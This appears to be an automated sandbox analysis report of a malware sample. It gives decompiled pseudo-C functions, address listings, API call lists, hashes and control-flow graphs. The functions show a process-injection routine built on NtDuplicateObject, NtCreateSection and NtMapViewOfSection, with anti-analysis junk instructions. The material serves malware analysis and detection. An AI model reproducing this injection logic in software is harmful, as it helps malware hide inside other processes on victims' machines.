                                                                                                    				_push(0x387);
                                                                                                    				_t205 = _t204 + 4;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t175, _t210);
                                                                                                    				_t126 =  *((intOrPtr*)(_t202 + 8));
                                                                                                    				_t176 = 0;
                                                                                                    				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                                                                    				if(gs != 0) {
                                                                                                    					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                                                                    				}
                                                                                                    				while(1) {
                                                                                                    					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
                                                                                                    					if(_t86 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
                                                                                                    				}
                                                                                                    				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
                                                                                                    				_t184 = _t202 - 0x60;
                                                                                                    				 *_t184 = _t176;
                                                                                                    				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t184);
                                                                                                    				_t89 =  *_t184;
                                                                                                    				if(_t89 != 0) {
                                                                                                    					_t132 = _t202 - 0x30;
                                                                                                    					 *_t132 = _t89;
                                                                                                    					 *(_t132 + 4) = _t176;
                                                                                                    					_t186 = _t202 - 0x28;
                                                                                                    					 *((intOrPtr*)(_t126 + 0x10))(_t186, 0x18);
                                                                                                    					 *_t186 = 0x18;
                                                                                                    					_push(_t202 - 0x30);
                                                                                                    					_push(_t186);
                                                                                                    					_push(0x40);
                                                                                                    					_push(_t202 - 0x10);
                                                                                                    					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
                                                                                                    						 *(_t202 - 8) = _t176;
                                                                                                    						_t96 = _t202 - 0x50;
                                                                                                    						 *(_t96 + 4) = _t176;
                                                                                                    						 *_t96 = 0x5000;
                                                                                                    						_t187 = _t202 - 0x54;
                                                                                                    						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
                                                                                                    							 *_t25 =  *(_t202 - 0x50);
                                                                                                    							_t120 = _t202 - 0x44;
                                                                                                    							 *_t120 = _t176;
                                                                                                    							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                                    								_t122 = _t202 - 0x3c;
                                                                                                    								 *_t122 = _t176;
                                                                                                    								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                                    									_t201 =  *(_t202 - 0x44);
                                                                                                    									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t201, 0x104);
                                                                                                    									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                                                                    									 *(_t202 - 8) =  *(_t202 - 8) + 1;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t98 = _t202 - 0x50;
                                                                                                    						 *(_t98 + 4) = _t176;
                                                                                                    						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                                                                    						_t188 = _t202 - 0x58;
                                                                                                    						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
                                                                                                    						if (_t99 != 0) goto L63;
                                                                                                    						 *_t99 =  *_t99 + _t99;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_push(0x15a4);
                                                                                                    				_t90 =  *_t205;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t176, _t231);
                                                                                                    				return _t90;
                                                                                                    			}
























                                                                                                    0x00401577
                                                                                                    0x00401578
                                                                                                    0x00401580
                                                                                                    0x00401592
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x004015f8
                                                                                                    0x004015f9
                                                                                                    0x004015fa
                                                                                                    0x004015fc
                                                                                                    0x00401602
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401649
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631189468.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1546783058-0
                                                                                                    • Opcode ID: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
                                                                                                    • Instruction ID: ba3189e89dbc592d8eefb072767128172b6b3105eb2a85c49d1307986ab5c8dd
                                                                                                    • Opcode Fuzzy Hash: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
                                                                                                    • Instruction Fuzzy Hash: 9D511B71900249BFEB209F91CC48FAF7BB8FF85B14F10412AFA11BA1E5D6749941CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 92 401523-401527 93 401529-40152e 92->93 94 40159f-4015b2 call 4011f5 92->94 93->94 97 4015b4 94->97 98 4015b7-4015bc 94->98 97->98 100 4015c2-4015d3 98->100 101 4018d7-4018df 98->101 105 4018d5 100->105 106 4015d9-401602 100->106 101->98 104 4018e4-40192f call 4011f5 101->104 105->104 106->105 113 401608-40161f NtDuplicateObject 106->113 113->105 115 401625-401649 NtCreateSection 113->115 117 4016a5-4016cb NtCreateSection 115->117 118 40164b-40166c NtMapViewOfSection 115->118 117->105 122 4016d1-4016d5 117->122 118->117 120 40166e-40168a NtMapViewOfSection 118->120 120->117 123 40168c-4016a2 120->123 122->105 125 4016db-4016fc NtMapViewOfSection 122->125 123->117 125->105 127 401702-40171e NtMapViewOfSection 125->127 127->105 130 401724 127->130 130->105 131 401724 call 401729 130->131 131->105
                                                                                                    C-Code - Quality: 87%
                                                                                                    			E00401523(void* __eax, void* __esi, void* __eflags) {
                                                                                                    				long _t89;
                                                                                                    				long _t92;
                                                                                                    				intOrPtr _t93;
                                                                                                    				struct _GUID _t99;
                                                                                                    				long _t100;
                                                                                                    				struct _GUID _t101;
                                                                                                    				long _t102;
                                                                                                    				PVOID* _t123;
                                                                                                    				long _t124;
                                                                                                    				PVOID* _t125;
                                                                                                    				long _t126;
                                                                                                    				intOrPtr _t129;
                                                                                                    				long* _t134;
                                                                                                    				void* _t176;
                                                                                                    				struct _EXCEPTION_RECORD _t177;
                                                                                                    				struct _EXCEPTION_RECORD* _t187;
                                                                                                    				intOrPtr* _t189;
                                                                                                    				HANDLE* _t190;
                                                                                                    				HANDLE* _t191;
                                                                                                    				void* _t204;
                                                                                                    				void* _t205;
                                                                                                    				intOrPtr* _t207;
                                                                                                    
                                                                                                    				asm("outsd");
                                                                                                    				asm("out 0x70, al");
                                                                                                    				if(__eflags > 0) {
                                                                                                    					L004011F5(_t176, __eflags);
                                                                                                    					_t129 =  *((intOrPtr*)(_t205 + 8));
                                                                                                    					_t177 = 0;
                                                                                                    					 *(_t205 - 0x34) = 0;
                                                                                                    					__eflags = gs;
                                                                                                    					if(gs != 0) {
                                                                                                    						_t4 = _t205 - 0x34;
                                                                                                    						 *_t4 =  *(_t205 - 0x34) + 1;
                                                                                                    						__eflags =  *_t4;
                                                                                                    					}
                                                                                                    					while(1) {
                                                                                                    						_t89 =  *((intOrPtr*)(_t129 + 0x48))();
                                                                                                    						__eflags = _t89;
                                                                                                    						if(_t89 != 0) {
                                                                                                    							break;
                                                                                                    						}
                                                                                                    						 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                                                                                                    					}
                                                                                                    					 *(_t205 - 0x5c) = _t89;
                                                                                                    					_t187 = _t205 - 0x60;
                                                                                                    					 *_t187 = _t177;
                                                                                                    					 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t187);
                                                                                                    					_t92 =  *_t187;
                                                                                                    					__eflags = _t92;
                                                                                                    					if(__eflags != 0) {
                                                                                                    						_t134 = _t205 - 0x30;
                                                                                                    						 *_t134 = _t92;
                                                                                                    						_t134[1] = _t177;
                                                                                                    						_t189 = _t205 - 0x28;
                                                                                                    						 *((intOrPtr*)(_t129 + 0x10))(_t189, 0x18);
                                                                                                    						 *_t189 = 0x18;
                                                                                                    						__eflags =  *((intOrPtr*)(_t129 + 0x70))(_t205 - 0x10, 0x40, _t189, _t205 - 0x30);
                                                                                                    						if(__eflags == 0) {
                                                                                                    							__eflags = NtDuplicateObject( *(_t205 - 0x10), 0xffffffff, 0xffffffff, _t205 - 0xc, _t177, _t177, 2);
                                                                                                    							if(__eflags == 0) {
                                                                                                    								 *(_t205 - 8) = _t177;
                                                                                                    								_t99 = _t205 - 0x50;
                                                                                                    								 *(_t99 + 4) = _t177;
                                                                                                    								 *_t99 = 0x5000;
                                                                                                    								_t190 = _t205 - 0x54;
                                                                                                    								_t100 = NtCreateSection(_t190, 6, _t177, _t99, 4, 0x8000000, _t177);
                                                                                                    								__eflags = _t100;
                                                                                                    								if(_t100 == 0) {
                                                                                                    									 *_t26 =  *(_t205 - 0x50);
                                                                                                    									_t123 = _t205 - 0x44;
                                                                                                    									 *_t123 = _t177;
                                                                                                    									_t124 = NtMapViewOfSection( *_t190, 0xffffffff, _t123, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
                                                                                                    									__eflags = _t124;
                                                                                                    									if(_t124 == 0) {
                                                                                                    										_t125 = _t205 - 0x3c;
                                                                                                    										 *_t125 = _t177;
                                                                                                    										_t126 = NtMapViewOfSection( *_t190,  *(_t205 - 0xc), _t125, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
                                                                                                    										__eflags = _t126;
                                                                                                    										if(_t126 == 0) {
                                                                                                    											_t204 =  *(_t205 - 0x44);
                                                                                                    											 *((intOrPtr*)(_t129 + 0x20))(_t177, _t204, 0x104);
                                                                                                    											 *((intOrPtr*)(_t204 + 0x208)) =  *((intOrPtr*)(_t205 + 0x14));
                                                                                                    											_t38 = _t205 - 8;
                                                                                                    											 *_t38 =  *(_t205 - 8) + 1;
                                                                                                    											__eflags =  *_t38;
                                                                                                    										}
                                                                                                    									}
                                                                                                    								}
                                                                                                    								_t101 = _t205 - 0x50;
                                                                                                    								 *(_t101 + 4) = _t177;
                                                                                                    								 *_t101 =  *((intOrPtr*)(_t205 + 0x10)) + 0x10000;
                                                                                                    								_t191 = _t205 - 0x58;
                                                                                                    								_t102 = NtCreateSection(_t191, 0xe, _t177, _t101, 0x40, 0x8000000, _t177);
                                                                                                    								__eflags = _t102;
                                                                                                    								if (_t102 != 0) goto L60;
                                                                                                    								 *_t102 =  *_t102 + _t102;
                                                                                                    								__eflags =  *_t102;
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    					_push(0x15a4);
                                                                                                    					_t93 =  *_t207;
                                                                                                    					_push(0x83);
                                                                                                    					L004011F5(_t177, __eflags);
                                                                                                    					return _t93;
                                                                                                    				} else {
                                                                                                    					asm("popfd");
                                                                                                    					asm("repe add al, 0x9b");
                                                                                                    					asm("wait");
                                                                                                    					asm("wait");
                                                                                                    					return __esi;
                                                                                                    				}
                                                                                                    			}

























                                                                                                    0x00401523
                                                                                                    0x00401524
                                                                                                    0x00401527
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015af
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015ba
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d1
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x00401600
                                                                                                    0x00401602
                                                                                                    0x0040161d
                                                                                                    0x0040161f
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401644
                                                                                                    0x00401647
                                                                                                    0x00401649
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x00401667
                                                                                                    0x0040166a
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x00401685
                                                                                                    0x00401688
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016c9
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x0040161f
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f
                                                                                                    0x00401529
                                                                                                    0x00401529
                                                                                                    0x0040152a
                                                                                                    0x0040152d
                                                                                                    0x0040152e
                                                                                                    0x0040152f
                                                                                                    0x0040152f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631189468.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$CreateDuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 3617974760-0
                                                                                                    • Opcode ID: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
                                                                                                    • Instruction ID: c9dca56e4daa214b2bd9150ebf0f157daf6c833c296841cdcd3f7df5e4c146b1
                                                                                                    • Opcode Fuzzy Hash: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
                                                                                                    • Instruction Fuzzy Hash: 91510A71900249BFEB209F92CC48F9FBBB8FF85B14F14411AFA11BA2A5D7749945CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 174 40158c-4015b2 call 4011f5 178 4015b4 174->178 179 4015b7-4015bc 174->179 178->179 181 4015c2-4015d3 179->181 182 4018d7-4018df 179->182 186 4018d5 181->186 187 4015d9-401602 181->187 182->179 185 4018e4-40192f call 4011f5 182->185 186->185 187->186 194 401608-40161f NtDuplicateObject 187->194 194->186 196 401625-401649 NtCreateSection 194->196 198 4016a5-4016cb NtCreateSection 196->198 199 40164b-40166c NtMapViewOfSection 196->199 198->186 203 4016d1-4016d5 198->203 199->198 201 40166e-40168a NtMapViewOfSection 199->201 201->198 204 40168c-4016a2 201->204 203->186 206 4016db-4016fc NtMapViewOfSection 203->206 204->198 206->186 208 401702-40171e NtMapViewOfSection 206->208 208->186 211 401724 208->211 211->186 212 401724 call 401729 211->212 212->186
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E0040158C(void* __eax, void* __edi) {
                                                                                                    				void* _t89;
                                                                                                    				intOrPtr _t91;
                                                                                                    				struct _EXCEPTION_RECORD _t94;
                                                                                                    				intOrPtr _t95;
                                                                                                    				struct _GUID _t101;
                                                                                                    				struct _GUID _t103;
                                                                                                    				long _t104;
                                                                                                    				PVOID* _t125;
                                                                                                    				PVOID* _t127;
                                                                                                    				intOrPtr _t131;
                                                                                                    				struct _EXCEPTION_RECORD* _t136;
                                                                                                    				void* _t180;
                                                                                                    				struct _EXCEPTION_RECORD _t181;
                                                                                                    				struct _EXCEPTION_RECORD* _t189;
                                                                                                    				intOrPtr* _t191;
                                                                                                    				HANDLE* _t192;
                                                                                                    				HANDLE* _t193;
                                                                                                    				void* _t206;
                                                                                                    				void* _t207;
                                                                                                    				void* _t208;
                                                                                                    				void* _t210;
                                                                                                    				intOrPtr* _t211;
                                                                                                    				intOrPtr _t216;
                                                                                                    
                                                                                                    				_t211 = _t210 + 1;
                                                                                                    				asm("clc");
                                                                                                    				asm("stc");
                                                                                                    				_t89 = _t207;
                                                                                                    				_t208 = __eax;
                                                                                                    				_t180 = __edi - 1;
                                                                                                    				_t2 = _t89 - 0x7d;
                                                                                                    				 *_t2 =  *((intOrPtr*)(_t89 - 0x7d));
                                                                                                    				_t216 =  *_t2;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t180, _t216);
                                                                                                    				_t131 =  *((intOrPtr*)(__eax + 8));
                                                                                                    				_t181 = 0;
                                                                                                    				 *((intOrPtr*)(__eax - 0x34)) = 0;
                                                                                                    				if(gs != 0) {
                                                                                                    					 *((intOrPtr*)(__eax - 0x34)) =  *((intOrPtr*)(__eax - 0x34)) + 1;
                                                                                                    				}
                                                                                                    				while(1) {
                                                                                                    					_t91 =  *((intOrPtr*)(_t131 + 0x48))();
                                                                                                    					if(_t91 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
                                                                                                    				}
                                                                                                    				 *((intOrPtr*)(_t208 - 0x5c)) = _t91;
                                                                                                    				_t189 = _t208 - 0x60;
                                                                                                    				 *_t189 = _t181;
                                                                                                    				 *((intOrPtr*)(_t131 + 0x4c))(_t91, _t189);
                                                                                                    				_t94 =  *_t189;
                                                                                                    				if(_t94 != 0) {
                                                                                                    					_t136 = _t208 - 0x30;
                                                                                                    					 *_t136 = _t94;
                                                                                                    					 *(_t136 + 4) = _t181;
                                                                                                    					_t191 = _t208 - 0x28;
                                                                                                    					 *((intOrPtr*)(_t131 + 0x10))(_t191, 0x18);
                                                                                                    					 *_t191 = 0x18;
                                                                                                    					_push(_t208 - 0x30);
                                                                                                    					_push(_t191);
                                                                                                    					_push(0x40);
                                                                                                    					_push(_t208 - 0x10);
                                                                                                    					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t181, _t181, 2) == 0) {
                                                                                                    						 *(_t208 - 8) = _t181;
                                                                                                    						_t101 = _t208 - 0x50;
                                                                                                    						 *(_t101 + 4) = _t181;
                                                                                                    						 *_t101 = 0x5000;
                                                                                                    						_t192 = _t208 - 0x54;
                                                                                                    						if(NtCreateSection(_t192, 6, _t181, _t101, 4, 0x8000000, _t181) == 0) {
                                                                                                    							 *_t28 =  *(_t208 - 0x50);
                                                                                                    							_t125 = _t208 - 0x44;
                                                                                                    							 *_t125 = _t181;
                                                                                                    							if(NtMapViewOfSection( *_t192, 0xffffffff, _t125, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
                                                                                                    								_t127 = _t208 - 0x3c;
                                                                                                    								 *_t127 = _t181;
                                                                                                    								if(NtMapViewOfSection( *_t192,  *(_t208 - 0xc), _t127, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
                                                                                                    									_t206 =  *(_t208 - 0x44);
                                                                                                    									 *((intOrPtr*)(_t131 + 0x20))(_t181, _t206, 0x104);
                                                                                                    									 *((intOrPtr*)(_t206 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
                                                                                                    									 *(_t208 - 8) =  *(_t208 - 8) + 1;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t103 = _t208 - 0x50;
                                                                                                    						 *(_t103 + 4) = _t181;
                                                                                                    						 *_t103 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
                                                                                                    						_t193 = _t208 - 0x58;
                                                                                                    						_t104 = NtCreateSection(_t193, 0xe, _t181, _t103, 0x40, 0x8000000, _t181);
                                                                                                    						if (_t104 != 0) goto L60;
                                                                                                    						 *_t104 =  *_t104 + _t104;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_push(0x15a4);
                                                                                                    				_t95 =  *_t211;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t181, _t237);
                                                                                                    				return _t95;
                                                                                                    			}


























                                                                                                    0x0040158c
                                                                                                    0x0040158d
                                                                                                    0x0040158e
                                                                                                    0x0040158f
                                                                                                    0x0040158f
                                                                                                    0x00401590
                                                                                                    0x00401591
                                                                                                    0x00401591
                                                                                                    0x00401591
                                                                                                    0x00401592
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x004015f8
                                                                                                    0x004015f9
                                                                                                    0x004015fa
                                                                                                    0x004015fc
                                                                                                    0x00401602
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401649
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631189468.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1546783058-0
                                                                                                    • Opcode ID: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
                                                                                                    • Instruction ID: 02d2e3ac3767ea31e924919402f7a0ff100aaf9667a8aefd77e34752db93229b
                                                                                                    • Opcode Fuzzy Hash: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
                                                                                                    • Instruction Fuzzy Hash: C9513AB1900249BFEB209F92CC48F9FBBB8FF85B14F10415AFA11AA1E5D7749944CB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 213 401585-4015b2 call 4011f5 220 4015b4 213->220 221 4015b7-4015bc 213->221 220->221 223 4015c2-4015d3 221->223 224 4018d7-4018df 221->224 228 4018d5 223->228 229 4015d9-401602 223->229 224->221 227 4018e4-40192f call 4011f5 224->227 228->227 229->228 236 401608-40161f NtDuplicateObject 229->236 236->228 238 401625-401649 NtCreateSection 236->238 240 4016a5-4016cb NtCreateSection 238->240 241 40164b-40166c NtMapViewOfSection 238->241 240->228 245 4016d1-4016d5 240->245 241->240 243 40166e-40168a NtMapViewOfSection 241->243 243->240 246 40168c-4016a2 243->246 245->228 248 4016db-4016fc NtMapViewOfSection 245->248 246->240 248->228 250 401702-40171e NtMapViewOfSection 248->250 250->228 253 401724 250->253 253->228 254 401724 call 401729 253->254 254->228
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E00401585() {
                                                                                                    				intOrPtr _t86;
                                                                                                    				struct _EXCEPTION_RECORD _t89;
                                                                                                    				intOrPtr _t90;
                                                                                                    				struct _GUID _t96;
                                                                                                    				struct _GUID _t98;
                                                                                                    				long _t99;
                                                                                                    				PVOID* _t120;
                                                                                                    				PVOID* _t122;
                                                                                                    				intOrPtr _t126;
                                                                                                    				struct _EXCEPTION_RECORD* _t132;
                                                                                                    				void* _t175;
                                                                                                    				struct _EXCEPTION_RECORD _t176;
                                                                                                    				struct _EXCEPTION_RECORD* _t185;
                                                                                                    				intOrPtr* _t187;
                                                                                                    				HANDLE* _t188;
                                                                                                    				HANDLE* _t189;
                                                                                                    				void* _t202;
                                                                                                    				void* _t203;
                                                                                                    				void* _t205;
                                                                                                    				intOrPtr* _t206;
                                                                                                    				void* _t211;
                                                                                                    
                                                                                                    				_push(0x387);
                                                                                                    				_t206 = _t205 + 4;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t175, _t211);
                                                                                                    				_t126 =  *((intOrPtr*)(_t203 + 8));
                                                                                                    				_t176 = 0;
